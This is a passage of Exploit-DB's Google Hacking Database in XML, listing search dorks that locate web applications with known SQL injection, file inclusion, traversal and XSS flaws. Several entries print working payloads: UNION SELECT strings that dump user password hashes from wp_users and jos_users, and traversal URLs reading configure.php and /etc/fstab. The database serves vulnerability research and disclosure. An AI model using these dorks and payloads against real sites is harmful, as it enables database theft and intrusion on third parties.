<author>anonymous</author>
</entry>
<entry>
<id>3278</id>
<link>https://www.exploit-db.com/ghdb/3278</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_soundset&quot;</shortDescription>
<textualDescription>Joomla CB Resume Builder SQL Injection - CVE: 2009-3645: https://www.exploit-db.com/exploits/10064</textualDescription>
<query>inurl:&quot;com_soundset&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_soundset%22</querystring>
<edb>https://www.exploit-db.com/exploits/10064</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3311</id>
<link>https://www.exploit-db.com/ghdb/3311</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_soundset&quot;</shortDescription>
<textualDescription>Joomla Soundset 1.0 SQL Injection - CVE: 2009-3644: https://www.exploit-db.com/exploits/10067</textualDescription>
<query>inurl:&quot;com_soundset&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_soundset%22</querystring>
<edb>https://www.exploit-db.com/exploits/10067</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3596</id>
<link>https://www.exploit-db.com/ghdb/3596</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_sqlreport&quot;</shortDescription>
<textualDescription>Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability - CVE: 2010-0753: https://www.exploit-db.com/exploits/11549</textualDescription>
<query>inurl:&quot;com_sqlreport&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_sqlreport%22</querystring>
<edb>https://www.exploit-db.com/exploits/11549</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3318</id>
<link>https://www.exploit-db.com/ghdb/3318</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_surveymanager&quot;</shortDescription>
<textualDescription>Joomla com_surveymanager SQL injection vulnerability - CVE: 2009-3325: https://www.exploit-db.com/exploits/9721</textualDescription>
<query>inurl:&quot;com_surveymanager&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_surveymanager%22</querystring>
<edb>https://www.exploit-db.com/exploits/9721</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3091</id>
<link>https://www.exploit-db.com/ghdb/3091</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_tupinambis&quot;</shortDescription>
<textualDescription>Joomla/Mambo Tupinambis SQL Injection - CVE: 2009-3434: https://www.exploit-db.com/exploits/9832</textualDescription>
<query>inurl:&quot;com_tupinambis&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_tupinambis%22</querystring>
<edb>https://www.exploit-db.com/exploits/9832</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2949</id>
<link>https://www.exploit-db.com/ghdb/2949</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_virtuemart&quot;</shortDescription>
<textualDescription>Joomla Component com_virtuemart SQL injection vulnerability (product_id): https://www.exploit-db.com/exploits/10407</textualDescription>
<query>inurl:&quot;com_virtuemart&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22com_virtuemart%22</querystring>
<edb>https://www.exploit-db.com/exploits/10407</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2759</id>
<link>https://www.exploit-db.com/ghdb/2759</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_wmtpic&quot;</shortDescription>
<textualDescription>Joomla Component com_wmtpic 1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14128</textualDescription>
<query>inurl:&quot;com_wmtpic&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_wmtpic%22</querystring>
<edb>https://www.exploit-db.com/exploits/14128</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2518</id>
<link>https://www.exploit-db.com/ghdb/2518</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_youtube&quot;</shortDescription>
<textualDescription>Joomla Component (com_youtube) SQL Injection Vulnerability - CVE: 2010-2923: https://www.exploit-db.com/exploits/14467</textualDescription>
<query>inurl:&quot;com_youtube&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_youtube%22</querystring>
<edb>https://www.exploit-db.com/exploits/14467</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2995</id>
<link>https://www.exploit-db.com/ghdb/2995</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;contentPage.php?id=&quot; &amp; inurl:&quot;displayResource.php?id=&quot; &amp; ...</shortDescription>
<textualDescription>MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12792</textualDescription>
<query>inurl:&quot;contentPage.php?id=&quot; OR inurl:&quot;displayResource.php?id=&quot; AND intext:&quot;Website by Mile High Creative&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22contentPage.php%3Fid%3D%22+OR+inurl:%22displayResource.php%3Fid%3D%22+AND+intext:%22Website+by+Mile+High+Creative%22</querystring>
<edb>https://www.exploit-db.com/exploits/12792</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3035</id>
<link>https://www.exploit-db.com/ghdb/3035</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;cont_form.php?cf_id=&quot;</shortDescription>
<textualDescription>WebDM CMS SQL Injection Vulnerability - CVE: 2010-2689: https://www.exploit-db.com/exploits/14123</textualDescription>
<query>inurl:&quot;cont_form.php?cf_id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22cont_form.php%3Fcf_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/14123</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3055</id>
<link>https://www.exploit-db.com/ghdb/3055</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;coursepage.php?id=&quot; intext:&quot;Web Site design by : Aim Web Design Cheshire&quot;</shortDescription>
<textualDescription>Aim Web Design Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12791</textualDescription>
<query>inurl:&quot;coursepage.php?id=&quot; intext:&quot;Web Site design by : Aim Web Design Cheshire&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22coursepage.php%3Fid%3D%22+intext:%22Web+Site+design+by+:+Aim+Web+Design+Cheshire%22</querystring>
<edb>https://www.exploit-db.com/exploits/12791</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1678</id>
<link>https://www.exploit-db.com/ghdb/1678</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;customer_testimonials.php&quot;</shortDescription>
<textualDescription>osCommerce Addon Customer Testimonials 3.1 SQL Injection Vulnerability - CVE: 2008-0719: https://www.exploit-db.com/exploits/5075</textualDescription>
<query>inurl:&quot;customer_testimonials.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22customer_testimonials.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/5075</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2675</id>
<link>https://www.exploit-db.com/ghdb/2675</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;directory.php?ax=list&quot; gaming</shortDescription>
<textualDescription>Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5374</textualDescription>
<query>inurl:&quot;directory.php?ax=list&quot; gaming</query>
<querystring>https://www.google.com/search?q=inurl:%22directory.php%3Fax%3Dlist%22+gaming</querystring>
<edb>https://www.exploit-db.com/exploits/5374</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2515</id>
<link>https://www.exploit-db.com/ghdb/2515</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;directory.php?cat=&quot; pubs</shortDescription>
<textualDescription>Prozilla Pub Site Directory (directory.php cat) SQL Injection Vulnerbility - CVE: 2007-4258: https://www.exploit-db.com/exploits/4265</textualDescription>
<query>inurl:&quot;directory.php?cat=&quot; pubs</query>
<querystring>https://www.google.com/search?q=inurl:%22directory.php%3Fcat%3D%22+pubs</querystring>
<edb>https://www.exploit-db.com/exploits/4265</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3146</id>
<link>https://www.exploit-db.com/ghdb/3146</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;e107_plugins/my_gallery&quot;</shortDescription>
<textualDescription>e107 Plugin My_Gallery 2.3 Arbitrary File Download Vulnerability - CVE: 2008-1702: https://www.exploit-db.com/exploits/5308</textualDescription>
<query>inurl:&quot;e107_plugins/my_gallery&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22e107_plugins/my_gallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/5308</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4436</id>
<link>https://www.exploit-db.com/ghdb/4436</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;exit.php?site=&quot;</shortDescription>
<textualDescription>Finds files that let you redirect users to any site!
Dxtroyer</textualDescription>
<query>inurl:&quot;exit.php?site=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;exit.php?site=&quot;</querystring>
<edb></edb>
<date>2017-04-17</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>4513</id>
<link>https://www.exploit-db.com/ghdb/4513</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;exit.php?url=&quot; -entry_id</shortDescription>
<textualDescription>Pages vulnerable to arbitrary redirection
Dxtroyer</textualDescription>
<query>inurl:&quot;exit.php?url=&quot; -entry_id</query>
<querystring>https://www.google.com/search?q=inurl:&quot;exit.php?url=&quot; -entry_id</querystring>
<edb></edb>
<date>2017-06-07</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>1329</id>
<link>https://www.exploit-db.com/ghdb/1329</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;extras/update.php&quot; intext:mysql.php -display</shortDescription>
<textualDescription>this is an osCommerce dork:inurl:&quot;extras/update.php&quot; intext:mysql.php -display or more simply: inurl:&quot;extras/update.php&quot; -display (this display some more hosts where error_reporting=0) I found this simple exploit, if extras/ folder is inside the www path, you can view all files on target system, including php files and so on, ex: http://[target]/[path]/extras/update.php?read_me=0&amp;readme_file=../catalog/includes/configure.php http://[target]/[path]/extras/update.php?read_me=0&amp;readme_file=../index.php http://[target]/[path]/extras/update.php?read_me=0&amp;readme_file=/etc/fstab also, if you succeed to view configure script with database details, you can connect to it trough some test scripts inside this folder...now I read this:http://www.securityfocus.com/bid/14294/infothis is actually unpatched/unresolved in 2.2 on Apr 2006</textualDescription>
<query>inurl:&quot;extras/update.php&quot; intext:mysql.php -display</query>
<querystring>https://www.google.com/search?q=inurl%3A%22extras%2Fupdate.php%22+intext%3Amysql.php+-display+&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3708</id>
<link>https://www.exploit-db.com/ghdb/3708</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;fbconnect_action=myhome&quot;</shortDescription>
<textualDescription>Submitter: z0mbyak
SQL Injection: www.site.name/path/?fbconnect_action=myhome&amp;fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--</textualDescription>
<query>inurl:&quot;fbconnect_action=myhome&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22fbconnect_action%3Dmyhome%22</querystring>
<edb></edb>
<date>2011-04-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>3295</id>
<link>https://www.exploit-db.com/ghdb/3295</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;fclick.php?fid&quot;</shortDescription>
<textualDescription>Fast Click (1.1.3 , 2.3.8) (show.php) Remote File Inclusion - CVE: 2006-2175: https://www.exploit-db.com/exploits/1740</textualDescription>
<query>inurl:&quot;fclick.php?fid&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22fclick.php%3Ffid%22</querystring>
<edb>https://www.exploit-db.com/exploits/1740</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1728</id>
<link>https://www.exploit-db.com/ghdb/1728</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;filebase.php&quot; &quot;Powered by phpBB&quot;</shortDescription>
<textualDescription>phpBB Mod FileBase (id) Remote SQL Injection Vulnerability - CVE: 2008-1305: https://www.exploit-db.com/exploits/5236</textualDescription>
<query>inurl:&quot;filebase.php&quot; &quot;Powered by phpBB&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22filebase.php%22+%22Powered+by+phpBB%22</querystring>
<edb>https://www.exploit-db.com/exploits/5236</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>649</id>
<link>https://www.exploit-db.com/ghdb/649</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;forumdisplay.php&quot; +&quot;Powered by: vBulletin Version 3.0.0..4&quot;</shortDescription>
<textualDescription>vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. An attacker may exploit this issue to manipulate and inject SQL queries onto the underlying database. It will be possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to make attacks against the underlying database. Versions 3.0 through to 3.0.3 are reportedly affected by this issue.http://www.securityfocus.com/bid/11193</textualDescription>
<query>inurl:&quot;forumdisplay.php&quot; +&quot;Powered by: vBulletin Version 3.0.0..4&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22forumdisplay.php%22+%2B%22Powered+by:+vBulletin+Version+3.0.0..4%22+&amp;c2coff=1&amp;rls=org.mozilla:en-US:official&amp;start=80&amp;sa=N</querystring>
<edb></edb>
<date>2004-11-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>2193</id>
<link>https://www.exploit-db.com/ghdb/2193</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;freshlinks_panel/index.php?linkid&quot;</shortDescription>
<textualDescription>PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln - CVE: 2008-5074: https://www.exploit-db.com/exploits/6620</textualDescription>
<query>inurl:&quot;freshlinks_panel/index.php?linkid&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22freshlinks_panel/index.php%3Flinkid%22</querystring>
<edb>https://www.exploit-db.com/exploits/6620</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2617</id>
<link>https://www.exploit-db.com/ghdb/2617</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;guestbook.admin.php?action=settings&quot;</shortDescription>
<textualDescription>Jax Guestbook 3.50 Admin Login - CVE: 2009-4447: https://www.exploit-db.com/exploits/10626</textualDescription>
<query>inurl:&quot;guestbook.admin.php?action=settings&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22guestbook.admin.php%3Faction%3Dsettings%22</querystring>
<edb>https://www.exploit-db.com/exploits/10626</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1762</id>
<link>https://www.exploit-db.com/ghdb/1762</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;ibase site:de&quot;</shortDescription>
<textualDescription>ibase 2.03 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-6288: https://www.exploit-db.com/exploits/6126</textualDescription>
<query>inurl:&quot;ibase site:de&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22ibase+site:de%22</querystring>
<edb>https://www.exploit-db.com/exploits/6126</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2181</id>
<link>https://www.exploit-db.com/ghdb/2181</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;IDFM=&quot; &quot;form.php&quot;</shortDescription>
<textualDescription>360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability - CVE: 2008-0430: https://www.exploit-db.com/exploits/4944</textualDescription>
<query>inurl:&quot;IDFM=&quot; &quot;form.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22IDFM%3D%22+%22form.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/4944</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6555</id>
<link>https://www.exploit-db.com/ghdb/6555</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;images/lists?cid=13&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;images/lists?cid=13&quot;
# MSVOD 10 - 'cid' SQL Injection. CVE : CVE-2018-14418.
https://www.exploit-db.com/exploits/45062
# Date: 17/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;images/lists?cid=13&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;images/lists?cid=13&quot;</querystring>
<edb></edb>
<date>2020-09-21</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5618</id>
<link>https://www.exploit-db.com/ghdb/5618</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.cfm?action=&quot; intext:&quot;Exception in onError&quot;</shortDescription>
<textualDescription>I have found a vulnerability in error page of coldfusion,
Name of author: Marcos Almeida
PoC
XSS
https://victimwebsite.com/?action=./ERROR?&quot;&gt;&amp;fw1pk=3
HTMLI
https://victimwebsite.com/?action=./ERROR?&quot;&gt;ERROR&amp;fw1pk=3
</textualDescription>
<query>inurl:&quot;index.cfm?action=&quot; intext:&quot;Exception in onError&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.cfm?action=&quot; intext:&quot;Exception in onError&quot;</querystring>
<edb></edb>
<date>2019-11-04</date>
<author>Marcos Almeida</author>
</entry>
<entry>
<id>4036</id>
<link>https://www.exploit-db.com/ghdb/4036</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php&quot; intext:&quot;ApPHP Hotel Site&quot; -site:&quot;apphp.com&quot;</shortDescription>
<textualDescription>Dork Identifies the sites with ApPHP-Hotel-Site 3.x.x vulnerable to sql
injection.
https://packetstormsecurity.com/files/132369/ApPHP-Hotel-Site-3.x.x-SQL-Injection.html
Regards,
Karan Ramani</textualDescription>
<query>inurl:&quot;index.php&quot; intext:&quot;ApPHP Hotel Site&quot; -site:&quot;apphp.com&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php&quot; intext:&quot;ApPHP Hotel Site&quot; -site:&quot;apphp.com&quot;</querystring>
<edb></edb>
<date>2015-07-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>2201</id>
<link>https://www.exploit-db.com/ghdb/2201</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?com_remository&quot;</shortDescription>
<textualDescription>Joomla Component (com_remository) Remote Upload File: https://www.exploit-db.com/exploits/14811</textualDescription>
<query>inurl:&quot;index.php?com_remository&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22index.php%3Fcom_remository%22</querystring>
<edb>https://www.exploit-db.com/exploits/14811</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1501</id>
<link>https://www.exploit-db.com/ghdb/1501</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?conteudo=&quot;</shortDescription>
<textualDescription>Waibrasil Remote / Local File Inclusion: https://www.exploit-db.com/exploits/12562</textualDescription>
<query>inurl:&quot;index.php?conteudo=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Fconteudo%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/12562</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3118</id>
<link>https://www.exploit-db.com/ghdb/3118</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?css=mid=art=&quot;</shortDescription>
<textualDescription>EasyWay CMS (index.php mid) Remote SQL Injection - CVE: 2008-2555: https://www.exploit-db.com/exploits/5706</textualDescription>
<query>inurl:&quot;index.php?css=mid=art=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Fcss%3Dmid%3Dart%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/5706</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3176</id>
<link>https://www.exploit-db.com/ghdb/3176</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?edicion_id=&quot;</shortDescription>
<textualDescription>Delivering Digital Media CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12840</textualDescription>
<query>inurl:&quot;index.php?edicion_id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Fedicion_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/12840</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1908</id>
<link>https://www.exploit-db.com/ghdb/1908</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?id_menu=&quot;</shortDescription>
<textualDescription>CMScontrol 7.x File Upload: https://www.exploit-db.com/exploits/11104</textualDescription>
<query>inurl:&quot;index.php?id_menu=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Fid_menu%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/11104</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3601</id>
<link>https://www.exploit-db.com/ghdb/3601</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?ind=blog&quot;</shortDescription>
<textualDescription>MKPortal 1.2.1 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7796/</textualDescription>
<query>inurl:&quot;index.php?ind=blog&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php?ind=blog%22</querystring>
<edb>https://www.exploit-db.com/exploits/7796</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3256</id>
<link>https://www.exploit-db.com/ghdb/3256</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?module=pnFlashGames&quot;</shortDescription>
<textualDescription>PostNuke Module pnFlashGames 2.5 SQL Injection Vulnerabilities - CVE: 2008-2013: https://www.exploit-db.com/exploits/5500</textualDescription>
<query>inurl:&quot;index.php?module=pnFlashGames&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Fmodule%3DpnFlashGames%22</querystring>
<edb>https://www.exploit-db.com/exploits/5500</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2043</id>
<link>https://www.exploit-db.com/ghdb/2043</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?m_id=&quot;</shortDescription>
<textualDescription>slogan design Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12849</textualDescription>
<query>inurl:&quot;index.php?m_id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Fm_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/12849</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3514</id>
<link>https://www.exploit-db.com/ghdb/3514</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?name=PNphpBB2&quot;</shortDescription>
<textualDescription>PNphpBB2 1.2 (index.php c) Remote SQL Injection - CVE: 2007-3052: https://www.exploit-db.com/exploits/4026</textualDescription>
<query>inurl:&quot;index.php?name=PNphpBB2&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Fname%3DPNphpBB2%22</querystring>
<edb>https://www.exploit-db.com/exploits/4026</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3624</id>
<link>https://www.exploit-db.com/ghdb/3624</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_annuaire&quot;</shortDescription>
<textualDescription>SQL Injection Vulnerability:
[+] vuln: http://127.0.0.1/index.php?option=com_annuaire&amp;view=annuaire&amp;type=cat&amp;id=[SQLi]
[+] Exploit: /**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--
Submitter: Ashiyane Digital Security Team</textualDescription>
<query>inurl:&quot;index.php?option=com_annuaire&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php?option=com_annuaire%22</querystring>
<edb></edb>
<date>2010-12-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>2669</id>
<link>https://www.exploit-db.com/ghdb/2669</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_bookjoomlas&quot;</shortDescription>
<textualDescription>Joomla Component com_bookjoomlas 0.1 SQL Injection Vulnerability - CVE: 2009-1263: https://www.exploit-db.com/exploits/8353</textualDescription>
<query>inurl:&quot;index.php?option=com_bookjoomlas&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_bookjoomlas%22</querystring>
<edb>https://www.exploit-db.com/exploits/8353</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3622</id>
<link>https://www.exploit-db.com/ghdb/3622</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_catalogue&quot;</shortDescription>
<textualDescription>Author: Ashiyane Digital Security Team SQL Injection: http://server/index.php?option=com_catalogue&amp;Itemid=73&amp;cat_id=-999 union select 1,version(),user(),4,5,6</textualDescription>
<query>inurl:&quot;index.php?option=com_catalogue&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php?option=com_catalogue%22</querystring>
<edb></edb>
<date>2010-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>6127</id>
<link>https://www.exploit-db.com/ghdb/6127</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_ccnewsletter&quot; inurl:sbid</shortDescription>
<textualDescription># Google Dork: inurl:&quot;index.php?option=com_ccnewsletter&quot; inurl:sbid
# Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection. This dork is
linked to the following existing exploit:
https://www.exploit-db.com/exploits/42387
# Date: 26/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;index.php?option=com_ccnewsletter&quot; inurl:sbid</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php?option=com_ccnewsletter&quot; inurl:sbid</querystring>
<edb></edb>
<date>2020-05-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3620</id>
<link>https://www.exploit-db.com/ghdb/3620</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_competitions&quot;</shortDescription>
<textualDescription>SQL Injection: http://127.0.0.1/index.php?option=com_competitions&amp;task=view&amp;id=-9 union all select 1,2,3,4,group_concat(username,0x3a,email,0x3a,password),6,7 from jos_users-- and XSS: http://127.0.0.1/index.php?option=com_competitions&amp;menu=XroGuE Author: Ashiyane Digital Security Team</textualDescription>
<query>inurl:&quot;index.php?option=com_competitions&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php?option=com_competitions%22</querystring>
<edb></edb>
<date>2010-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1765</id>
<link>https://www.exploit-db.com/ghdb/1765</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_djiceshoutbox&quot;</shortDescription>
<textualDescription>Joomla Djice Shoutbox 1.0 Permanent XSS Vulnerability: https://www.exploit-db.com/exploits/8197</textualDescription>
<query>inurl:&quot;index.php?option=com_djiceshoutbox&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_djiceshoutbox%22</querystring>
<edb>https://www.exploit-db.com/exploits/8197</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6099</id>
<link>https://www.exploit-db.com/ghdb/6099</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_fabrik&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;index.php?option=com_fabrik&quot;
# Joomla! com_fabrik 3.9.11 - Directory Traversal. This dork is linked to
the following existing exploit: https://www.exploit-db.com/exploits/48263
# Date: 19/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;index.php?option=com_fabrik&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php?option=com_fabrik&quot;</querystring>
<edb></edb>
<date>2020-05-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6080</id>
<link>https://www.exploit-db.com/ghdb/6080</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_hdwplayer&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;index.php?option=com_hdwplayer&quot;
# Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection. This dork is
linked to the following existing exploit:
https://www.exploit-db.com/exploits/48242
# Date: 14/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;index.php?option=com_hdwplayer&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php?option=com_hdwplayer&quot;</querystring>
<edb></edb>
<date>2020-05-14</date>
